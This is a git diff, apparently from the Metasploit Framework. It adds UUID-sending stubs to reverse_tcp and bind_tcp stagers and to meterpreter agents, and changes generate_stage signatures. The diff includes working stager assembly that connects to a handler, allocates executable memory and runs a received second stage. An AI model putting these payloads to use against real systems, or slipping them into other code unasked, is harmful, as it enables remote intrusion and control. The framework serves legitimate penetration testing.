 .../stages/windows/x64/meterpreter.rb         | 20 ++--
 48 files changed, 743 insertions(+), 178 deletions(-)
 create mode 100644 lib/msf/core/payload/linux/send_uuid.rb
 create mode 100644 lib/msf/core/payload/windows/send_uuid.rb
 create mode 100644 lib/msf/core/payload/windows/x64/send_uuid.rb
 create mode 100644 modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/windows/bind_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/windows/reverse_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb

diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index 156966fcf5..ab71743636 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
@@ -32,7 +32,7 @@ if (!isset($GLOBALS['readers'])) {
 
 # global list of extension commands
 if (!isset($GLOBALS['commands'])) {
-    $GLOBALS['commands'] = array("core_loadlib");
+    $GLOBALS['commands'] = array("core_loadlib", "core_uuid");
 }
 
 function register_command($c) {
@@ -99,18 +99,21 @@ function socket_set_option($sock, $type, $opt, $value) {
 }
 }
 
+#
+# Payload definitions
+#
+define("PAYLOAD_UUID", "");
 
 #
 # Constants
 #
-define("PACKET_TYPE_REQUEST",0);
-define("PACKET_TYPE_RESPONSE",1);
-define("PACKET_TYPE_PLAIN_REQUEST", 10);
+define("PACKET_TYPE_REQUEST",         0);
+define("PACKET_TYPE_RESPONSE",        1);
+define("PACKET_TYPE_PLAIN_REQUEST",  10);
 define("PACKET_TYPE_PLAIN_RESPONSE", 11);
 
-define("ERROR_SUCCESS",0);
-# not defined in original C implementation
-define("ERROR_FAILURE",1);
+define("ERROR_SUCCESS", 0);
+define("ERROR_FAILURE", 1);
 
 define("CHANNEL_CLASS_BUFFERED", 0);
 define("CHANNEL_CLASS_STREAM",   1);
@@ -175,6 +178,9 @@ define("TLV_TYPE_TARGET_PATH",         TLV_META_TYPE_STRING | 401);
 define("TLV_TYPE_MIGRATE_PID",         TLV_META_TYPE_UINT   | 402);
 define("TLV_TYPE_MIGRATE_LEN",         TLV_META_TYPE_UINT   | 403);
 
+define("TLV_TYPE_MACHINE_ID",          TLV_META_TYPE_STRING | 460);
+define("TLV_TYPE_UUID",                TLV_META_TYPE_RAW    | 461);
+
 define("TLV_TYPE_CIPHER_NAME",         TLV_META_TYPE_STRING | 500);
 define("TLV_TYPE_CIPHER_PARAMETERS",   TLV_META_TYPE_GROUP  | 501);
 
@@ -419,6 +425,11 @@ function core_loadlib($req, &$pkt) {
 }
 
 
+function core_uuid($req, &$pkt) {
+    my_print("doing core_uuid");
+    packet_add_tlv($pkt, create_tlv(TLV_TYPE_UUID, PAYLOAD_UUID));
+    return ERROR_SUCCESS;
+}
 
 
 
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 98221836cc..e1736f67c6 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -67,6 +67,7 @@ HTTP_CONNECTION_URL = None
 HTTP_EXPIRATION_TIMEOUT = 604800
 HTTP_PROXY = None
 HTTP_USER_AGENT = None
+PAYLOAD_UUID = ""
 
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
@@ -144,6 +145,7 @@ TLV_TYPE_MIGRATE_PID           = TLV_META_TYPE_UINT    | 402
 TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403
 
 TLV_TYPE_MACHINE_ID            = TLV_META_TYPE_STRING  | 460
+TLV_TYPE_UUID                  = TLV_META_TYPE_RAW     | 461
 
 TLV_TYPE_CIPHER_NAME           = TLV_META_TYPE_STRING  | 500
 TLV_TYPE_CIPHER_PARAMETERS     = TLV_META_TYPE_GROUP   | 501
@@ -570,6 +572,10 @@ class PythonMeterpreter(object):
 		pkt  = struct.pack('>I', len(pkt) + 4) + pkt
 		self.send_packet(pkt)
 
+	def _core_uuid(self, request, response):
+		response += tlv_pack(TLV_TYPE_UUID, PAYLOAD_UUID)
+		return ERROR_SUCCESS, response
+
 	def _core_machine_id(self, request, response):
 		serial = ''
 		machine_name = platform.uname()[1]
@@ -594,9 +600,10 @@ class PythonMeterpreter(object):
 		else:
 			for _, _, files in os.walk('/dev/disk/by-id/'):
 				for f in files:
-					if f[:4] == 'ata-':
-						serial = f[4:]
-						break
+					for p in ['ata-', 'mb-']:
+						if f[:len(p)] == p:
+							serial = f[len(p):]
+							break
 		response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
 		return ERROR_SUCCESS, response
 
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index d442d6727d..c590495887 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -254,7 +254,10 @@ protected
         url = payload_uri(req) + conn_id + '/'
 
         blob = ""
-        blob << obj.generate_stage
+        blob << obj.generate_stage(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         var_escape = lambda { |txt|
           txt.gsub('\\', '\\'*8).gsub('\'', %q(\\\\\\\'))
@@ -291,7 +294,10 @@ protected
         url = payload_uri(req) + conn_id + "/\x00"
 
         blob = ""
-        blob << obj.generate_stage
+        blob << obj.generate_stage(
+          uuid: uuid,
+          uri:  conn_id
+        )
 
         # This is a TLV packet - I guess somewhere there should be an API for building them
         # in Metasploit :-)
diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index 6eb0699235..c1ec362da2 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -318,6 +318,16 @@ class Payload < Msf::Module
     apply_prepends(generate)
   end
 
+  #
+  # Convert raw bytes to metasm-ready 'db' encoding format
+  # eg. "\x90\xCC" => "db 0x90,0xCC"
+  #
+  # @param raw [Array] Byte array to encode.
+  #
+  def raw_to_db(raw)
+    raw.unpack("C*").map {|c| "0x%.2x" % c}.join(",")
+  end
+
   #
   # Substitutes variables with values from the module's datastore in the
   # supplied raw buffer for a given set of named offsets.  For instance,
diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb
index 43ecd9cc61..6037bdf925 100644
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -17,7 +17,7 @@ module Msf::Payload::Dalvik
   #
   # We could compile the .class files with dx here
   #
-  def generate_stage
+  def generate_stage(opts={})
   end
 
   #
diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb
index 0de18cc652..91a288e599 100644
--- a/lib/msf/core/payload/generic.rb
+++ b/lib/msf/core/payload/generic.rb
@@ -123,8 +123,8 @@ module Payload::Generic
     redirect_to_actual(:stage_over_connection?)
   end
 
-  def generate_stage
-    redirect_to_actual(:generate_stage)
+  def generate_stage(opts={})
+    redirect_to_actual(:generate_stage, opts)
   end
 
   def handle_connection_stage(*args)
diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb
index d8ecdf500a..bebcedca32 100644
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@@ -14,7 +14,7 @@ module Msf::Payload::Java
   #	[ 32-bit big endian length ][ Nth raw .class file]
   #	[ 32-bit null ]
   #
-  def generate_stage
+  def generate_stage(opts={})
     stage = ''
     @stage_class_files.each do |path|
       data = MetasploitPayloads.read('java', path)
diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb
index 83b02fc4a4..06bc75f80d 100644
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/linux/send_uuid'
 
 module Msf
 
@@ -17,6 +18,7 @@ module Payload::Linux::BindTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Linux
+  include Msf::Payload::Linux::SendUUID
 
   #
   # Generate the first stage
@@ -36,6 +38,14 @@ module Payload::Linux::BindTcp
     generate_bind_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   #
   # Generate and compile the stager
   #
@@ -133,6 +143,11 @@ module Payload::Linux::BindTcp
         mov [ecx+0x4],edx
         int 0x80                      ; invoke socketcall (SYS_ACCEPT)
         xchg eax,ebx
+    ^
+
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
         mov dh,0xc                    ; at least 0x0c00 bytes
         mov al,0x3                    ; read syscall
         int 0x80                      ; invoke read
diff --git a/lib/msf/core/payload/linux/reverse_tcp.rb b/lib/msf/core/payload/linux/reverse_tcp.rb
index 5b190f93b0..bad961c820 100644
--- a/lib/msf/core/payload/linux/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/reverse_tcp.rb
@@ -3,6 +3,7 @@
 require 'msf/core'
 require 'msf/core/payload/transport_config'
 require 'msf/core/payload/linux'
+require 'msf/core/payload/linux/send_uuid'
 
 module Msf
 
@@ -18,6 +19,7 @@ module Payload::Linux::ReverseTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Linux
+  include Msf::Payload::Linux::SendUUID
 
   #
   # Generate the first stage
@@ -39,6 +41,14 @@ module Payload::Linux::ReverseTcp
     generate_reverse_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   def transport_config(opts={})
     transport_config_reverse_tcp(opts)
   end
@@ -89,9 +99,10 @@ module Payload::Linux::ReverseTcp
       push 0x2
       mov al, 0x66
       mov ecx, esp
-      int 0x80                   ; sys_socketcall
-      xchg eax, edi
-      pop ebx
+      int 0x80                   ; sys_socketcall (socket())
+
+      xchg eax, edi              ; store the socket in edi
+      pop ebx                    ; set ebx back to zero
       push #{encoded_host}
       push #{encoded_port}
       mov ecx, esp
@@ -102,7 +113,12 @@ module Payload::Linux::ReverseTcp
       push edi
       mov ecx, esp
       inc ebx
-      int 0x80                  ; sys_socketcall
+      int 0x80                  ; sys_socketcall (connect())
+    ^
+
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
       mov dl, 0x7
       mov ecx, 0x1000
       mov ebx, esp
@@ -110,12 +126,13 @@ module Payload::Linux::ReverseTcp
       shl ebx, 0xc
       mov al, 0x7d
       int 0x80                  ; sys_mprotect
+
       pop ebx
       mov ecx, esp
       cdq
       mov dh, 0xc
       mov al, 0x3
-      int 0x80                  ; sys_read
+      int 0x80                  ; sys_read (recv())
       jmp ecx
     ^
 
diff --git a/lib/msf/core/payload/linux/send_uuid.rb b/lib/msf/core/payload/linux/send_uuid.rb
new file mode 100644
index 0000000000..bc7bc34ee5
--- /dev/null
+++ b/lib/msf/core/payload/linux/send_uuid.rb
@@ -0,0 +1,53 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for Linux ARCH_X86 payloads
+#
+###
+
+module Payload::Linux::SendUUID
+
+  #
+  # Generate assembly code that writes the UUID to the socket.
+  #
+  # This code assumes that the communications socket handle is in edi.
+  #
+  def asm_send_uuid(uuid=nil)
+    unless uuid
+      uuid = Msf::Payload::UUID.new(
+        platform: 'linux',
+        arch:     ARCH_X86
+      )
+    end
+
+    uuid_raw = uuid.to_raw
+
+    asm =%Q^
+      send_uuid:
+        push 0                        ; terminate the args array
+        push #{uuid_raw.length}       ; length of the UUID
+        call get_uuid_address         ; put uuid buffer on tehe stack
+        db #{raw_to_db(uuid_raw)}     ; UUID itself
+      get_uuid_address:
+        push edi                      ; socket handle
+        mov ecx, esp                  ; store the pointer to the argument arra
+        push 0x9                      ; SYS_SEND
+        pop ebx
+        push 0x66                     ; sys_socketcall
+        pop eax
+        int 0x80
+    ^
+
+    asm
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb
index 206433046e..aa1826809b 100644
--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -131,14 +131,14 @@ module Msf::Payload::Stager
   # Generates the stage payload and substitutes all offsets.
   #
   # @return [String] The generated payload stage, as a string.
-  def generate_stage
+  def generate_stage(opts={})
     # XXX: This is nearly identical to Payload#internal_generate
 
     # Compile the stage as necessary
     if stage_assembly and !stage_assembly.empty?
       raw = build(stage_assembly, stage_offsets)
     else
-      raw = stage_payload.dup
+      raw = stage_payload(opts).dup
     end
 
     # Substitute variables in the stage
@@ -156,7 +156,14 @@ module Msf::Payload::Stager
     # If the stage should be sent over the client connection that is
     # established (which is the default), then go ahead and transmit it.
     if (stage_over_connection?)
-      p = generate_stage
+      uuid_raw = conn.get_once(16, 1)
+
+      opts = {}
+      if uuid_raw
+        opts[:uuid] = Msf::Payload::UUID.new({raw: uuid_raw})
+      end
+
+      p = generate_stage(opts)
 
       # Encode the stage if stage encoding is enabled
       begin
diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb
index 5aa6cd3f94..c6488f2174 100644
--- a/lib/msf/core/payload/windows/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/bind_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/windows/send_uuid'
 require 'msf/core/payload/windows/block_api'
 require 'msf/core/payload/windows/exitfunk'
 
@@ -19,6 +20,7 @@ module Payload::Windows::BindTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::SendUUID
   include Msf::Payload::Windows::BlockApi
   include Msf::Payload::Windows::Exitfunk
 
@@ -40,6 +42,14 @@ module Payload::Windows::BindTcp
     generate_bind_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   def transport_config(opts={})
     transport_config_bind_tcp(opts)
   end
@@ -136,17 +146,17 @@ module Payload::Windows::BindTcp
         push edi               ; socket
         push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
         call ebp               ; bind( s, &sockaddr_in, 16 );
-      ^
-
-      # Check for a failed bind() call
-      if reliable
-        asm << %Q^
-            test eax,eax
-            jnz failure
-          ^
-      end
+    ^
 
+    # Check for a failed bind() call
+    if reliable
       asm << %Q^
+        test eax,eax
+        jnz failure
+      ^
+    end
+
+    asm << %Q^
                                ; backlog, pushed earlier [3]
         push edi               ; socket
         push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
@@ -162,7 +172,11 @@ module Payload::Windows::BindTcp
         xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
         push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
         call ebp               ; closesocket( s );
+    ^
 
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
       recv:
         ; Receive the size of the incoming second stage...
         push 0                 ; flags
@@ -171,17 +185,17 @@ module Payload::Windows::BindTcp
         push edi               ; the saved socket
         push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
         call ebp               ; recv( s, &dwLength, 4, 0 );
-      ^
-
-      # Check for a failed recv() call
-      if reliable
-        asm << %Q^
-            cmp eax, 0
-            jle failure
-          ^
-      end
+    ^
 
+    # Check for a failed recv() call
+    if reliable
       asm << %Q^
+        cmp eax, 0
+        jle failure
+      ^
+    end
+
+    asm << %Q^
         ; Alloc a RWX buffer for the second stage
         mov esi, [esi]         ; dereference the pointer to the second stage length
         push 0x40              ; PAGE_EXECUTE_READWRITE
@@ -200,38 +214,37 @@ module Payload::Windows::BindTcp
         push edi               ; the saved socket
         push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
         call ebp               ; recv( s, buffer, length, 0 );
-      ^
-
-      # Check for a failed recv() call
-      if reliable
-        asm << %Q^
-            cmp eax, 0
-            jle failure
-          ^
-      end
+    ^
 
+    # Check for a failed recv() call
+    if reliable
       asm << %Q^
+        cmp eax, 0
+        jle failure
+      ^
+    end
+
+    asm << %Q^
         add ebx, eax           ; buffer += bytes_received
         sub esi, eax           ; length -= bytes_received, will set flags
         jnz read_more          ; continue if we have more to read
         ret                    ; return into the second stage
+    ^
+
+    if reliable
+      if opts[:exitfunk]
+        asm << %Q^
+      failure:
+        ^
+        asm << asm_exitfunk(opts)
+      else
+        asm << %Q^
+      failure:
+        push 0x56A2B5F0        ; hardcoded to exitprocess for size
+        call ebp
         ^
-
-      if reliable
-        if opts[:exitfunk]
-          asm << %Q^
-            failure:
-
-            ^
-          asm << asm_exitfunk(opts)
-        else
-          asm << %Q^
-            failure:
-              push 0x56A2B5F0        ; hardcoded to exitprocess for size
-              call ebp
-            ^
-        end
       end
+    end
 
     asm
   end
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
index 770effc317..4440166649 100644
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/windows/send_uuid'
 require 'msf/core/payload/windows/block_api'
 require 'msf/core/payload/windows/exitfunk'
 
@@ -17,6 +18,7 @@ module Payload::Windows::ReverseTcp
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::SendUUID
   include Msf::Payload::Windows::BlockApi
   include Msf::Payload::Windows::Exitfunk
 
@@ -40,6 +42,14 @@ module Payload::Windows::ReverseTcp
     generate_reverse_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   def transport_config(opts={})
     transport_config_reverse_tcp(opts)
   end
@@ -141,21 +151,21 @@ module Payload::Windows::ReverseTcp
       handle_failure:
         dec dword [esi+8]
         jnz try_connect
-      ^
+    ^
 
-      if opts[:exitfunk]
-        asm << %Q^
-          failure:
-            call exitfunk
-          ^
-      else
-        asm << %Q^
-          failure:
-            push 0x56A2B5F0        ; hardcoded to exitprocess for size
-            call ebp
-          ^
-      end
-      # TODO: Rewind the stack, free memory, try again
+    if opts[:exitfunk]
+      asm << %Q^
+        failure:
+          call exitfunk
+        ^
+    else
+      asm << %Q^
+        failure:
+          push 0x56A2B5F0        ; hardcoded to exitprocess for size
+          call ebp
+        ^
+    end
+    # TODO: Rewind the stack, free memory, try again
 =begin
       if opts[:reliable]
         asm << %Q^
@@ -165,7 +175,9 @@ module Payload::Windows::ReverseTcp
       end
 =end
 
-      asm << %Q^
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
       connected:
 
       recv:
@@ -176,18 +188,18 @@ module Payload::Windows::ReverseTcp
         push edi               ; the saved socket
         push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
         call ebp               ; recv( s, &dwLength, 4, 0 );
-      ^
-
-      # Check for a failed recv() call
-      # TODO: Try again by jmping to reconnect
-      if reliable
-        asm << %Q^
-            cmp eax, 0
-            jle failure
-          ^
-      end
+    ^
 
+    # Check for a failed recv() call
+    # TODO: Try again by jmping to reconnect
+    if reliable
       asm << %Q^
+          cmp eax, 0
+          jle failure
+        ^
+    end
+
+    asm << %Q^
         ; Alloc a RWX buffer for the second stage
         mov esi, [esi]         ; dereference the pointer to the second stage length
         push 0x40              ; PAGE_EXECUTE_READWRITE
@@ -213,17 +225,17 @@ module Payload::Windows::ReverseTcp
     # TODO: Try again by jmping to reconnect
     if reliable
       asm << %Q^
-          cmp eax, 0
-          jle failure
-        ^
+        cmp eax, 0
+        jle failure
+      ^
     end
 
     asm << %Q^
-      add ebx, eax           ; buffer += bytes_received
-      sub esi, eax           ; length -= bytes_received, will set flags
-      jnz read_more          ; continue if we have more to read
-      ret                    ; return into the second stage
-      ^
+        add ebx, eax           ; buffer += bytes_received
+        sub esi, eax           ; length -= bytes_received, will set flags
+        jnz read_more          ; continue if we have more to read
+        ret                    ; return into the second stage
+    ^
 
     if opts[:exitfunk]
       asm << asm_exitfunk(opts)
diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb
new file mode 100644
index 0000000000..5535ebfee5
--- /dev/null
+++ b/lib/msf/core/payload/windows/send_uuid.rb
@@ -0,0 +1,50 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for Windows ARCH_X86 payloads
+#
+###
+
+module Payload::Windows::SendUUID
+
+  #
+  # Generate assembly code that writes the UUID to the socket.
+  #
+  # This code assumes that the block API pointer is in ebp, and
+  # the communications socket handle is in edi.
+  #
+  def asm_send_uuid(uuid=nil)
+    unless uuid
+      uuid = Msf::Payload::UUID.new(
+        platform: 'windows',
+        arch:     ARCH_X86
+      )
+    end
+
+    uuid_raw = uuid.to_raw
+
+    asm =%Q^
+      send_uuid:
+        push 0                 ; flags
+        push #{uuid_raw.length} ; length of the UUID
+        call get_uuid_address  ; put uuid buffer on tehe stack
+        db #{raw_to_db(uuid_raw)}  ; UUID
+      get_uuid_address:
+        push edi               ; saved socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        call ebp               ; call send
+    ^
+
+    asm
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb
index e9a9633591..f7f032dc8c 100644
--- a/lib/msf/core/payload/windows/x64/bind_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/windows/x64/send_uuid'
 require 'msf/core/payload/windows/x64/block_api'
 require 'msf/core/payload/windows/x64/exitfunk'
 
@@ -17,6 +18,7 @@ module Payload::Windows::BindTcp_x64
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::SendUUID_x64
   include Msf::Payload::Windows::BlockApi_x64
   include Msf::Payload::Windows::Exitfunk_x64
 
@@ -38,6 +40,14 @@ module Payload::Windows::BindTcp_x64
     generate_bind_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   def transport_config(opts={})
     transport_config_bind_tcp(opts)
   end
@@ -149,7 +159,11 @@ module Payload::Windows::BindTcp_x64
         call rbp               ; closesocket( s );
         ; restore RSP so we dont have any alignment issues with the next block...
         add rsp, #{408+8+8*4+32*7} ; cleanup the stack allocations
+    ^
 
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
       recv:
         ; Receive the size of the incoming second stage...
         sub rsp, 16            ; alloc some space (16 bytes) on stack for to hold the second stage length
diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
index 110a3a1294..9101a147e1 100644
--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/transport_config'
+require 'msf/core/payload/windows/x64/send_uuid'
 require 'msf/core/payload/windows/x64/block_api'
 require 'msf/core/payload/windows/x64/exitfunk'
 
@@ -17,6 +18,7 @@ module Payload::Windows::ReverseTcp_x64
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
+  include Msf::Payload::Windows::SendUUID_x64
   include Msf::Payload::Windows::BlockApi_x64
   include Msf::Payload::Windows::Exitfunk_x64
 
@@ -47,6 +49,14 @@ module Payload::Windows::ReverseTcp_x64
     generate_reverse_tcp(conf)
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
   #
   # Generate and compile the stager
   #
@@ -112,17 +122,17 @@ module Payload::Windows::ReverseTcp_x64
         mov r12, #{encoded_host_port}
         push r12               ; host, family AF_INET and port
         mov r12, rsp           ; save pointer to sockaddr struct for connect call
-        ; perform the call to LoadLibraryA...
+      ; perform the call to LoadLibraryA...
         mov rcx, r14           ; set the param for the library to load
         mov r10d, 0x0726774C   ; hash( "kernel32.dll", "LoadLibraryA" )
         call rbp               ; LoadLibraryA( "ws2_32" )
-        ; perform the call to WSAStartup...
+      ; perform the call to WSAStartup...
         mov rdx, r13           ; second param is a pointer to this stuct
         push 0x0101            ;
         pop rcx                ; set the param for the version requested
         mov r10d, 0x006B8029   ; hash( "ws2_32.dll", "WSAStartup" )
         call rbp               ; WSAStartup( 0x0101, &WSAData );
-        ; perform the call to WSASocketA...
+      ; perform the call to WSASocketA...
         push rax               ; if we succeed, rax wil be zero, push zero for the flags param.
         push rax               ; push null for reserved parameter
         xor r9, r9             ; we do not specify a WSAPROTOCOL_INFO structure
@@ -134,7 +144,7 @@ module Payload::Windows::ReverseTcp_x64
         mov r10d, 0xE0DF0FEA   ; hash( "ws2_32.dll", "WSASocketA" )
         call rbp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
         mov rdi, rax           ; save the socket for later
-        ; perform the call to connect...
+      ; perform the call to connect...
         push 16                ; length of the sockaddr struct
         pop r8                 ; pop off the third param
         mov rdx, r12           ; set second param to pointer to sockaddr struct
@@ -143,7 +153,11 @@ module Payload::Windows::ReverseTcp_x64
         call rbp               ; connect( s, &sockaddr, 16 );
         ; restore RSP so we dont have any alignment issues with the next block...
         add rsp, #{408+8+8*4+32*4} ; cleanup the stack allocations
+    ^
 
+    asm << asm_send_uuid if include_send_uuid
+
+    asm << %Q^
       recv:
         ; Receive the size of the incoming second stage...
         sub rsp, 16            ; alloc some space (16 bytes) on stack for to hold the second stage length
diff --git a/lib/msf/core/payload/windows/x64/send_uuid.rb b/lib/msf/core/payload/windows/x64/send_uuid.rb
new file mode 100644
index 0000000000..9f0de57262
--- /dev/null
+++ b/lib/msf/core/payload/windows/x64/send_uuid.rb
@@ -0,0 +1,52 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for Windows ARCH_X86_64 payloads
+#
+###
+
+module Payload::Windows::SendUUID_x64
+
+  #
+  # Generate assembly code that writes the UUID to the socket.
+  #
+  # This code assumes that the block API pointer is in rbp, and
+  # the communications socket handle is in rdi.
+  #
+  def asm_send_uuid(uuid=nil)
+    unless uuid
+      uuid = Msf::Payload::UUID.new(
+        platform: 'windows',
+        arch:     ARCH_X86_64
+      )
+    end
+
+    uuid_raw = uuid.to_raw
+
+    asm =%Q^
+      send_uuid:
+        xor r9, r9              ; flags
+        push #{uuid_raw.length} ; length of the UUID
+        pop r8
+        call get_uuid_address  ; put uuid buffer on tehe stack
+        db #{raw_to_db(uuid_raw)}  ; UUID
+      get_uuid_address:
+        pop rdx                ; UUID address
+        mov rcx, rdi           ; Socket handle
+        mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
+        call rbp               ; call send
+    ^
+
+    asm
+  end
+
+end
+
+end
+
diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb
index 17eb2c5195..fb391f6b3d 100644
--- a/modules/payloads/singles/bsd/x64/exec.rb
+++ b/modules/payloads/singles/bsd/x64/exec.rb
@@ -41,7 +41,7 @@ module Metasploit3
   #
   # Dynamically builds the exec payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     cmd_str = datastore['CMD'] || ''
     # Split the cmd string into arg chunks
     cmd_parts = Shellwords.shellsplit(cmd_str)
diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb
index b407766c64..552ff37273 100644
--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -45,7 +45,7 @@ module Metasploit3
   #
   # Dynamically builds the exec payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     bsd_x86_exec_payload
   end
 
diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb
index e7f95502bd..d8b72f2391 100644
--- a/modules/payloads/singles/linux/armle/adduser.rb
+++ b/modules/payloads/singles/linux/armle/adduser.rb
@@ -43,7 +43,7 @@ module Metasploit3
   #
   # Dynamically builds the adduser payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     user    = datastore['USER']  || 'metasploit'
     pass    = datastore['PASS']  || 'metasploit'
     shell   = datastore['SHELL'] || '/bin/sh'
diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb
index 1782fa7b6b..0b3bd3c7ba 100644
--- a/modules/payloads/singles/linux/armle/exec.rb
+++ b/modules/payloads/singles/linux/armle/exec.rb
@@ -35,7 +35,7 @@ module Metasploit3
       ], self.class)
   end
 
-  def generate_stage
+  def generate_stage(opts={})
     cmd     = datastore['CMD'] || ''
 
     payload =
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index 83860c1c42..430527ecf7 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -28,7 +28,7 @@ module Metasploit3
       ], self.class)
   end
 
